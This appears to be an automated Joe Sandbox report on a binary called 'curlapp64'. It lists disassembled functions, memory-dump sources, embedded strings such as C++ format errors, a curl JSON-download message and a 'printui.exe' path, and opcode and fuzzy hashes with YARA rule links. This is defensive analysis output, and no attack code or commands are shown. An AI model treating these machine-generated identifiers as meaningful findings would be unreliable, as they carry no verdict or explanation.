                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.$\printui.exe$ZYo
                                                                                                                                                                                                  • API String ID: 909987262-3451706659
                                                                                                                                                                                                  • Opcode ID: f6c01c62c856ee2be7a03454592f55a0d395d35d3f4a1897c86b8231bee07cf6
                                                                                                                                                                                                  • Instruction ID: 7a26581f5f4ac46a13387c23c7b8c5b1e3e5f090b9a720090c57298d3eae476d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6c01c62c856ee2be7a03454592f55a0d395d35d3f4a1897c86b8231bee07cf6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52C1DD22F18A4689EF10DF25D4402BD33A1FB45B85F959132DA9D93B9ADF3CE285C360
                                                                                                                                                                                                  Function 00007FF6CF98CCF0 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 216COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.$ZYo
                                                                                                                                                                                                  • API String ID: 909987262-3467575773
                                                                                                                                                                                                  • Opcode ID: 0440b771705aa634b53f916a856052b374cef2cdcb0320de4155a09d44106426
                                                                                                                                                                                                  • Instruction ID: e36f608b4650b5b3be049cc0485410527d6f62f003c04c1e16663e110fd30511
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0440b771705aa634b53f916a856052b374cef2cdcb0320de4155a09d44106426
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2291CF22F08A458AFF109F65D4503BC33B1AB0478AF544233DA9E9369ADE3CE599C360
                                                                                                                                                                                                  Function 00007FF6CF97C000 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 391COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                                                                                                                                                                                  • String ID: value$ZYo
                                                                                                                                                                                                  • API String ID: 1346393832-4010713825
                                                                                                                                                                                                  • Opcode ID: 0310b5d94356e1a0248a2bd8b34368017910e743543c174186e30fec618f3732
                                                                                                                                                                                                  • Instruction ID: b94826a5a62cc6bae8c9511250b4020358de4670a42aeac26d1677ae2f1f5382
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0310b5d94356e1a0248a2bd8b34368017910e743543c174186e30fec618f3732
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F19362E18B8185EF10DF79D4403BD2761EB867A5F515232EA9D97AEFDE2DE080C310
                                                                                                                                                                                                  Function 00007FF6CF99C560 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 196COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                                                                                  • API String ID: 909987262-255851600
                                                                                                                                                                                                  • Opcode ID: 7338f14aa2b8dfdc9b787f0f1bed3670266d6db603b78cfa3b9079e8c3764772
                                                                                                                                                                                                  • Instruction ID: 25f566c9b2147ceab04978d9131309df26dc7568d47212ec28effd8c98acce37
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7338f14aa2b8dfdc9b787f0f1bed3670266d6db603b78cfa3b9079e8c3764772
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C71A322D0C1874AEE649F15C9506B827A0EB51B82F8A4032D7DD837DBDF6CE6D18375
                                                                                                                                                                                                  Function 00007FF6CF9943E0 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 428COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                                                                                                                                                                                                  • String ID: integral cannot be stored in char$ZYo
                                                                                                                                                                                                  • API String ID: 3363080787-1866195891
                                                                                                                                                                                                  • Opcode ID: d326fcb0b71cde1728c00bb70a5fec91d517ac7fc11d43fdbee93278b1298833
                                                                                                                                                                                                  • Instruction ID: c4cd6afc8bb8a84782b531e422e7d218d6b55c317dc9730de1123fc562fa78b3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d326fcb0b71cde1728c00bb70a5fec91d517ac7fc11d43fdbee93278b1298833
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D302C122E18B8189EF11CF69E4402BD67A0FB4579AF558231EADD83A9EDF3CD581C710
                                                                                                                                                                                                  Function 00007FF6CF99EEB0 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 423COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                                                                                                                                                                                                  • String ID: integral cannot be stored in wchar_t$ZYo
                                                                                                                                                                                                  • API String ID: 3363080787-4117134163
                                                                                                                                                                                                  • Opcode ID: fb57e847a963c36a3cda755f35a7df29a17cddc41c5d7e92136bd2a57e193ef2
                                                                                                                                                                                                  • Instruction ID: d89abccf7e4029370581043b7cca6f2c81ff393e645dab0559bc09702c96fd92
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb57e847a963c36a3cda755f35a7df29a17cddc41c5d7e92136bd2a57e193ef2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8802B822A1878189EF20CF65E4402BDB7A0FB84799F554135EADE87A9EDF3CD581C710
                                                                                                                                                                                                  Function 00007FF6CF9A9EB8 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 411COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: 0$0$0$0$0
                                                                                                                                                                                                  • API String ID: 3215553584-4235325143
                                                                                                                                                                                                  • Opcode ID: 4d461d4d9c64d6e66a0ba516f054edcf1e575eb74db0db9928d6c50a3596f0fd
                                                                                                                                                                                                  • Instruction ID: f42a07e0133a0a97befa38fe9fcf1d8929f16c23f1fdd241992e4480ba7bcfa5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d461d4d9c64d6e66a0ba516f054edcf1e575eb74db0db9928d6c50a3596f0fd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E1D532D0D696C7EF698E1584902BDB7D1EB12746F548036CACDC738FDE2DA8699320
                                                                                                                                                                                                  Function 00007FF6CF97D010 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 331COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
                                                                                                                                                                                                  • API String ID: 3668304517-4239264347
                                                                                                                                                                                                  • Opcode ID: a496131e1601ee1da4032f93157b180dc9060424fff5b47d4220b7b3c46e69df
                                                                                                                                                                                                  • Instruction ID: 17a0afdb375fa8043194dfe7db1bf6037283d304f30e234e48531ff60e79bcc9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a496131e1601ee1da4032f93157b180dc9060424fff5b47d4220b7b3c46e69df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68E1AC62F1475189FF109FA1D8403AC23A2BB457A9F514233DEAD6BADEDF789481C310
                                                                                                                                                                                                  Function 00007FF6CF99E640 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 123COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                                                                                  • API String ID: 909987262-435359029
                                                                                                                                                                                                  • Opcode ID: 642a8238d151c4605239283559881541d420088661b931672251598b2cba6790
                                                                                                                                                                                                  • Instruction ID: 4a2e87ec1b58cd4e4a557b86761ae7b098ca0ce65845361dd5cf6d597646a799
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 642a8238d151c4605239283559881541d420088661b931672251598b2cba6790
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7341F722E085468AEF14AF18D4402F923A0FF51746F954132E7EDC26EADF2DE691C761
                                                                                                                                                                                                  Function 00007FF6CF993BD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                                                                                  • API String ID: 909987262-435359029
                                                                                                                                                                                                  • Opcode ID: bc76b05ba397fed6e1359d1205a953b518802d55c4f0041b205f2babdd8f0f63
                                                                                                                                                                                                  • Instruction ID: 7c386d51354bf9b5c91adfe1ad717cc5b6de7cb71c34a1f4e5fa554c001e33a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc76b05ba397fed6e1359d1205a953b518802d55c4f0041b205f2babdd8f0f63
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2414822A0C9854AEE148F28C0616B933B9EF51742F695132D7ECC21EBEF2CE695C711
                                                                                                                                                                                                  Function 00007FF8B9F65340 Relevance: 16.7, APIs: 11, Instructions: 179COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$_lseeki64mallocwcstombs$__stdio_common_vsprintf_open_wopen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1856395618-0
                                                                                                                                                                                                  • Opcode ID: f60c49f5dcef5d14e5ae0bf2741802d50be5dafa20a35e074c88c31dceb54001
                                                                                                                                                                                                  • Instruction ID: 5ac296875c235f6b38328233e4b158592b8f51b924c3ce8d0e910efc8c8dc214
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f60c49f5dcef5d14e5ae0bf2741802d50be5dafa20a35e074c88c31dceb54001
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA715A72A0CB8286EB648F29D45413936A2EB45BFAF642334CB6A977D4DF3DD851C700
                                                                                                                                                                                                  Function 00007FF6CF974C60 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: curl_easy_init$curl_easy_cleanup
                                                                                                                                                                                                  • String ID: CURL could not be initialized download_json$CURL could not be re-initialized download_json$ZYo
                                                                                                                                                                                                  • API String ID: 2458899574-2379373502
                                                                                                                                                                                                  • Opcode ID: 45d67a3488c91eb043ddc74514686c5712c44494333c84a48ba91fd53bb45306
                                                                                                                                                                                                  • Instruction ID: 1e3972896e0962377536a81579753c8ed349d8c02481108cda32f20a00b1f209
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45d67a3488c91eb043ddc74514686c5712c44494333c84a48ba91fd53bb45306
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1A19F62A08B8185EF109F65E4403BD67A1FB857A5F504236EADD87B9BEF3CE590C310
                                                                                                                                                                                                  Function 00007FF6CF996530 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 157COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                  • String ID: bad locale name$false$true
                                                                                                                                                                                                  • API String ID: 4121308752-1062449267
                                                                                                                                                                                                  • Opcode ID: a6b038fd9b20093d5a44b931743a8a7475515f91206f559108f24990fee8ea96
                                                                                                                                                                                                  • Instruction ID: 709f498d9f371fdbf926af95a007989d3c60ff0bcdfe2afd2362fff8f6f9fd3e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6b038fd9b20093d5a44b931743a8a7475515f91206f559108f24990fee8ea96
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF614822E0A7428AFF15DFA094603BC23B5AF44749F154039DE8CA7A9EDE38A556C364
                                                                                                                                                                                                  Function 00007FF8B9F6DAC0 Relevance: 15.2, APIs: 10, Instructions: 227COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                                  • Opcode ID: 3ff9b8e8d4e4d987ff99c83a879715d8304c9a3c2ceeeb745bce6cd9f66a06e2
                                                                                                                                                                                                  • Instruction ID: cbc7a31483f9a2b444c156670d5b4600ec81a880924810171fc7e2af8fed4305
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ff9b8e8d4e4d987ff99c83a879715d8304c9a3c2ceeeb745bce6cd9f66a06e2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1981BD21E0C7C386FA54AF6EDC412B926A1AF85BE6F546035DB0C47396DE7CE845E320
                                                                                                                                                                                                  Function 00007FF8B9F65200 Relevance: 15.1, APIs: 10, Instructions: 108COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165900335.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165771310.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165938811.00007FF8B9F6F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165963780.00007FF8B9F77000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b9f60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$_close
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3165389682-0
                                                                                                                                                                                                  • Opcode ID: 8cde90166b2398b283f0e54bdcdeead90dbafe5d92020d39cf43bc81dab7b3a2
                                                                                                                                                                                                  • Instruction ID: ab366ac6509a312a52aa8eb28fcff0dad2d07db1cd24fdca1ce4658d57c402ce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cde90166b2398b283f0e54bdcdeead90dbafe5d92020d39cf43bc81dab7b3a2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94411232A1878186EB549F7DE45423962A1EF84BB6F642331D72E427E9CF3CE846C640
                                                                                                                                                                                                  Function 00007FF6CF9A69B0 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 310COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                  • String ID: csm$csm$csm$ZYo
                                                                                                                                                                                                  • API String ID: 849930591-443663966
                                                                                                                                                                                                  • Opcode ID: c987dc07aa77382b82d933b9bd73357070bbf54a8ef333fe3d2b907b2246b907
                                                                                                                                                                                                  • Instruction ID: 89e574fb2926b6c49a17ddc40b9347d527b9bd74ddd0b7ad5c4e32101956b5be
